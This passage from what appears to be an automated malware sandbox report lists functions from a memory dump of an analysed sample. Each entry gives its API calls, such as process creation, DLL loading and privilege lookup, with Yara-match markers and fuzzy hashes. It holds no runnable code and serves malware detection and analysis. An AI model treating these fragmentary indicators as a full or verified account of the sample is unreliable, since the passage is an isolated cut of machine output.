                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04B3836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                            • Instruction ID: 8ceab16c6880789fceb40dd5f0e8a0fc50779bfbe3bf79a89a01b8587a7e795a
                                            • Opcode Fuzzy Hash: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                            • Instruction Fuzzy Hash: 4701A731A802287BF720A6999C42FBE776CAB44F55F154198FF04BA1C0E694790646F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B382B6, Relevance: 3.0, APIs: 2, Instructions: 49threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04B3834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04B3836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: c4663f0b0eca51fbe80b1b10438eb6166ef0282aa58f842af6a482b3d05a18fa
                                            • Instruction ID: 68ab48de47053ebf01b8e0fc4355cf5042f16759057b9ab8621f8d91fa129f9d
                                            • Opcode Fuzzy Hash: c4663f0b0eca51fbe80b1b10438eb6166ef0282aa58f842af6a482b3d05a18fa
                                            • Instruction Fuzzy Hash: B301D632A401187AE710AAB5EC42FE97358EB44B25F180199FE049B280E695B50983E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B3ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(00000000,00000000,00000003,?), ref: 04B3AD42
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Dll.00000008.00000002.496329933.0000000004E80000.00000040.00000001Load
                                            • String ID:
                                            • API String ID: 3693416928-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: 40a58f371f10569674d16f701f16a71916e90f4988ac94176bf8335d79ed00b4
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: 6A015EB5D4020DABEF10DFE4DC41F9DB7789B44608F1041D4A90897280F670FB049B91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B4A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04B4A134
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 0e99beea90bc7acc57be02358a7fd963341199ab3e63ca2b5a0abf0782475754
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 3D01AFB2210108BBDB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B4A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(04B44506,?,04B44C7F,04B44C7F,?,04B44506,?,?,?,?,?,00000000,00000000,?), ref: 04B4A05D
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateE80000.00000040.00000001Heap.00000008.00000002.496329933.0000000004
                                            • String ID:
                                            • API String ID: 4214558427-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 7a22430fe952963d3ca9f116e9d9fd963d8d3bfbc16f3fe59e5d91d3ad4af596
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: A0E04FB1200208BBD714DF99CC40EA777ACEF88654F118558FE085B241C530F910CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B4A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,04B3F1A2,04B3F1A2,?,00000000,?,?), ref: 04B4A200
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 90870dd48fbb8e50e71356a0e8d25435bcb2985091a3beb5419b854b555d1458
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 50E01AB12002086BDB10DF89CC84EE737ADEF88650F018154BA0867241C930F8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B3F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00008003,?,04B38CF4,?), ref: 04B3F6CB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction ID: f2c451898582b0afb9db897ffe063b7cc57d69bf1f69e02f0f6d736d993a170d
                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction Fuzzy Hash: 69D0A7717903043BF610FAA59C03F2632CDAB48B05F4900A4FA48D73C3D950F1008165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions